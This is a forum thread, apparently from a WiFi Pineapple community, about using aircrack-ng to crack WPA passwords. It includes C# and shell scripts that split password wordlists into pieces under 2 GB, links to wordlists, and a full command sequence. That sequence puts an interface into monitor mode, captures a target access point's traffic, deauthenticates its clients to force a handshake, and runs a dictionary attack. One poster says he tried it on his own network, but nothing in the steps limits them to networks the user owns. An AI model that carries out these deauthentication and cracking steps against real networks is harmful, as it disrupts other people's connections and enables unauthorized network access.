reaper_666 Posted November 1, 2014
Hello, I searched the user infusions for the pineapple on my pineapple but I didn't find aircrack. How can I use aircrack on the pineapple?
overwraith Posted November 1, 2014 (edited)
I don't see how to post attachments, so I cannot post my Word doc with pictures on this website. The Aircrack-ng documentation will have to suffice.
http://www.aircrack-ng.org/doku.php?id=cracking_wpa

You will need a wordlist, which you will have to get elsewhere. I think I got mine here:
http://www.renderlab.net/projects/WPA-tables/

There is also a bug in the Aircrack-ng 1.1 suite (on the pineapple) that does not allow wordlists larger than 2 GB, so you will need to break up the wordlists into about 1900 MB chunks. I wrote a C# program to do that, but if you use the C# program you will have to use special software to be able to access Linux file systems on Windows. If somebody could write it in C?

    /*Author: overwraith*/
    using System;
    using System.IO;
    using System.Text;

    namespace SplitFile
    {
        class Program
        {
            // Example: SplitFile.exe -f "E:\Super-WPA" -s "1900M" -d "E:\Wordlists"
            static void Main(string[] args)
            {
                String usage = "SplitFile.exe -f <fileToSplit> -s <size(G/M/K/B)> -d destination";
                String fname = null;
                long byteSize = 0;
                String destination = "";

                // set up command line arguments
                if (args.Length == 0)
                {
                    Console.WriteLine(usage);
                    Environment.Exit(0);
                }
                for (int i = 0; i < args.Length - 1; i++)
                {
                    if (args[i] == "-f")
                    {   // file to split
                        fname = args[i + 1];
                    }
                    else if (args[i] == "-s")
                    {   // partition size, with optional G/M/K/B suffix
                        String str = args[i + 1];
                        if (str.EndsWith("G"))
                        {   // gigabytes
                            long.TryParse(str.TrimEnd('G'), out byteSize);
                            byteSize *= 1024L * 1024 * 1024;
                        }
                        else if (str.EndsWith("M"))
                        {   // megabytes
                            long.TryParse(str.TrimEnd('M'), out byteSize);
                            byteSize *= 1024 * 1024;
                        }
                        else if (str.EndsWith("K"))
                        {   // kilobytes (the original trimmed 'M' here, so "-s 500K" parsed as 0)
                            long.TryParse(str.TrimEnd('K'), out byteSize);
                            byteSize *= 1024;
                        }
                        else
                        {   // bytes, with or without a trailing B
                            long.TryParse(str.TrimEnd('B'), out byteSize);
                        }
                    }
                    else if (args[i] == "-d")
                    {   // destination directory
                        destination = args[i + 1];
                    }
                }
                if (fname == null || byteSize <= 0)
                {
                    Console.WriteLine(usage);
                    Environment.Exit(1);
                }

                Console.WriteLine("\t\t***Partitioning file***");
                Console.WriteLine("Target File: " + fname);
                Console.WriteLine("Partition Sizes: " + byteSize);
                Console.WriteLine("Destination: " + destination + "\n");

                // write the new partitions; a password line is never split across two files
                Encoding enc = new UTF8Encoding(false);   // no BOM, so the chunks concatenate back to the original
                using (StreamReader reader = new StreamReader(fname, enc))
                {
                    StreamWriter writer = null;
                    long counter = 0;   // bytes written to the current partition
                    int i = 0;
                    String password;
                    while ((password = reader.ReadLine()) != null)
                    {
                        // count bytes rather than chars (non-ASCII lines are longer than their length), +1 for "\n"
                        long lineBytes = enc.GetByteCount(password) + 1;
                        if (writer == null || counter + lineBytes > byteSize)
                        {
                            if (writer != null) writer.Close();   // flushes the buffered stream
                            i++;
                            String partition = Path.Combine(destination, Path.GetFileName(fname) + i.ToString("D2"));
                            Console.WriteLine("Writing new file: " + partition);
                            writer = new StreamWriter(partition, false, enc);
                            writer.NewLine = "\n";   // Linux line endings, not "\r\n"
                            counter = 0;
                        }
                        writer.WriteLine(password);
                        counter += lineBytes;
                    }
                    // the original never closed the last partition, so its buffered tail was lost
                    if (writer != null) writer.Close();
                }
            }
        }
    }

The software I used to access Linux file systems on Windows is: http://www.ext2fsd.com/

You should actually move the cracking operation onto a desktop computer, because the pineapple is a little lacking in processing power. Also, I do not have the benefit of having enough hardware for a Linux box at the moment, but you should plan on making a Linux laptop, or something. Probably Kali Linux. Others might have a better procedure in mind.
Edited November 1, 2014 by overwraith
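The same split done with POSIX tools, as an added example that is not part of overwraith's post or the C# program above. It assumes only sh, awk, wc, cat and cmp (all present in BusyBox on the Pineapple and on any Linux desktop), so it needs no ext2 driver on Windows; the five-line wordlist and the 17-byte limit in the demo are constructed sample input, and the function names are mine.

```sh
#!/bin/sh
# Added example, not from the thread: split a wordlist into chunks that never
# exceed a byte limit and never cut a line in half, then prove the chunks
# concatenate back to the original. Motivation: aircrack-ng 1.1 rejects
# wordlists over 2 GB. Needs only POSIX sh, awk, wc, cat and cmp.

# split_wordlist <wordlist> <max_bytes> <out_prefix>
# Writes <out_prefix>001, <out_prefix>002, ... and prints the chunk count.
# A single line longer than max_bytes gets a chunk of its own plus a warning.
split_wordlist() {
    wl=$1; max=$2; prefix=$3
    LC_ALL=C awk -v max="$max" -v prefix="$prefix" '
        BEGIN { n = 0; used = 0; out = "" }
        {
            len = length($0) + 1            # bytes under LC_ALL=C, +1 for "\n"
            if (len > max)
                printf "warning: line %d is %d bytes, over the %d limit\n", NR, len, max > "/dev/stderr"
            if (out == "" || used + len > max) {
                if (out != "") close(out)   # flush the finished chunk
                n++; used = 0
                out = sprintf("%s%03d", prefix, n)
            }
            print $0 > out
            used += len
        }
        END { if (out != "") close(out); print n }
    ' "$wl"
}

# verify_split <wordlist> <max_bytes> <out_prefix>
# Returns 0 when every chunk is within max_bytes and the chunks, in order,
# are byte-for-byte identical to the original (no BOM, no lost tail).
verify_split() {
    wl=$1; max=$2; prefix=$3
    for f in "$prefix"[0-9][0-9][0-9]; do
        size=$(wc -c < "$f" | tr -d ' ')
        [ "$size" -le "$max" ] || { echo "chunk $f is $size bytes, over $max" >&2; return 1; }
    done
    cat "$prefix"[0-9][0-9][0-9] | cmp -s - "$wl"
}

# demo: constructed five-line wordlist with a 17-byte limit; prints "ok <chunks>" or "FAIL".
# Expected chunks: "password\nletmein\n" (exactly 17 bytes, the limit is inclusive),
# "hunter2\n" (8 bytes), "qwerty123\nsecret\n" (17 bytes).
demo() {
    dir=$(mktemp -d)
    printf 'password\nletmein\nhunter2\nqwerty123\nsecret\n' > "$dir/wordlist.txt"
    n=$(split_wordlist "$dir/wordlist.txt" 17 "$dir/wordlist.txt.")
    if verify_split "$dir/wordlist.txt" 17 "$dir/wordlist.txt."; then
        echo "ok $n"
    else
        echo "FAIL"
    fi
    rm -rf "$dir"
}

# Real use, on the desktop box that will do the cracking (1900 MiB chunks):
#   split_wordlist Super-WPA $((1900 * 1024 * 1024)) wordlists/Super-WPA.
#   verify_split  Super-WPA $((1900 * 1024 * 1024)) wordlists/Super-WPA. && echo chunks verified
demo
```

The limit is checked before a line is written, so a chunk can be exactly the limit but never over it; the verification step matters because a silently truncated last chunk (the bug in the C# version's unflushed final writer) would just make aircrack-ng miss candidates without any error.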
reaper_666 Posted November 1, 2014
Thank you overwraith, but how do I install aircrack on the pineapple? Or is it pre-installed? Using it with ssl? The way to use aircrack I know ;)
overwraith Posted November 1, 2014 (edited)
Aircrack-ng 1.1 is already installed on the pineapple, it is just an old version. Note that AP stands for access point, and MAC is the media access control address, and when I say <something> I want you to fill in something without the <> symbols.

    #Turn on injection radio
    ifconfig wlan1 up
    #Use this to check
    ifconfig
    #turn off airmon if it is already on
    airmon-ng stop wlan1
    #turn on airmon, provide it with wlan1
    airmon-ng start wlan1
    #scan APs in the area
    #note the channel of the AP you want to attack, and its MAC address
    iwlist wlan0 scan
    #turn on airodump
    airodump-ng -c <channel no> --bssid <MAC address> -w <dump file without extension> wlan1
    ...
    #A nifty screen appears; if no stations are present, pack up and try again tomorrow, you need populated APs to collect a handshake
    #open another terminal connection to the pineapple, and start deauthing some of the clients you noted in the airodump screen
    #Do this to about 3 clients if you can; the 100 count will keep deauthing them for a while, only deauth as much as you need
    #I found that I had to deauth more because my AP and the clients ignore a number of deauths.
    #aireplay-ng needs the interface as its last argument (it was missing in the original post)
    aireplay-ng -0 100 -a <AP MAC> -c <Client MAC> wlan1
    #back on the airodump screen there should be a WPA handshake notice that appears on the top right hand side of the screen
    #kill the program after you get the handshake, it has done its job
    #finally the cracking process begins
    aircrack-ng -w <wordlist> -b <MAC address AP> <capfile.cap>
    #a screen with the current passphrase, master key, transient key and EAPOL HMAC should appear; it will test until it finds the right phrase

I have a Windows machine, it is so bad, I PuTTY in; you will probably use ssh or something.
Edited November 1, 2014 by overwraith
Sebkinne Posted November 1, 2014
(quoting overwraith's instructions above in full)
Make sure wlan1 is down, otherwise you cannot channel hop.
Best regards,
Sebkinne
overwraith Posted November 1, 2014 (edited)
(quoting Sebkinne: "Make sure wlan1 is down, otherwise you cannot channel hop.")
I don't understand, this worked when I did it to my own network. Wouldn't that make it so that it couldn't inject or receive traffic?
Edited November 1, 2014 by overwraith
Sebkinne Posted November 1, 2014
(quoting overwraith: "I don't understand, this worked when I did it to my own network. Wouldn't that make it so that it couldn't inject or receive traffic?")
No, as long as wlan1 is up, you'll see the channel as -1.
Best regards,
Sebkinne
overwraith Posted November 1, 2014
So we should put the scanning procedure before we activate wlan1?
Sebkinne Posted November 1, 2014
(quoting overwraith: "So we should put the scanning procedure before we activate wlan1?")
No. Put wlan1 down instead of up, airmon it, never bring wlan1 up and use mon0 as the interface.
reaper_666 Posted November 2, 2014
Oh nice! Thank you for explaining. Is it possible to update Aircrack?
overwraith Posted November 2, 2014
(quoting reaper_666: "Is it possible to update Aircrack?")
I would also like to know this.
DataHead Posted November 2, 2014 (edited)
In the openwrt /kamikaze/8.09.2/ar71xx/packages/ directory there is aircrack-ng_r1396-1.2_mips.ipk. Seeing as it is an older build of openwrt, would this still install on our ar71xx Attitude Adjustment build? As of now, our version on the pineapple is 1.1.
Edited November 2, 2014 by datahead